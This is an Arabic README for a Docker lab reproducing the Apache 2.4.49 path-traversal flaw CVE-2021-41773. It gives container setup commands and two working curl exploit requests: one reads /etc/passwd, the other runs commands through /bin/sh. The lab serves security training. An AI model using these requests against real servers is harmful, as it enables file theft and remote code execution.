
# مختبر ضعيف قائم على Docker لثغرة CVE-2021-41773 في Apache لتجاوز المسار، مع توفير إعدادات PoC لقراءة الملفات وتنفيذ الأكواد عن بُعد في بيئة محكومة.
تنطبق هذه الثغرة فقط على الإصدار 2.4.49 الذي يحتوي على إعدادات غير افتراضية محددة. في حالات معينة، يمكن أن يؤدي ذلك إلى قراءة ملفات أو تنفيذ كود.
https://twitter.com/ptswarm/status/1445376079548624899
يمكن سحب الحاويات مباشرة من Docker Hub باستخدام
docker pull blueteamsteve/cve-2021-41773:no-cgid
وتشغيلها باستخدام
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
يمكن عرض سجلات Apache باستخدام الأمر أدناه، أو فقط استبعاد "-dit" من أمر التشغيل أعلاه لبث stdio
docker logs <container-id>
curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
يمكن سحب الحاويات مباشرة من Docker Hub باستخدام
docker pull blueteamsteve/cve-2021-41773:with-cgid
وتشغيلها باستخدام
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid
يمكن عرض سجلات Apache باستخدام الأمر أدناه، أو فقط استبعاد "-dit" من أمر التشغيل أعلاه لبث stdio
docker logs <container-id>
curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'
قم بتعديل وبناء إصداراتك الخاصة باستخدام ملفات dockerfile وملفات httpd.conf النموذجية في الدلائل الفرعية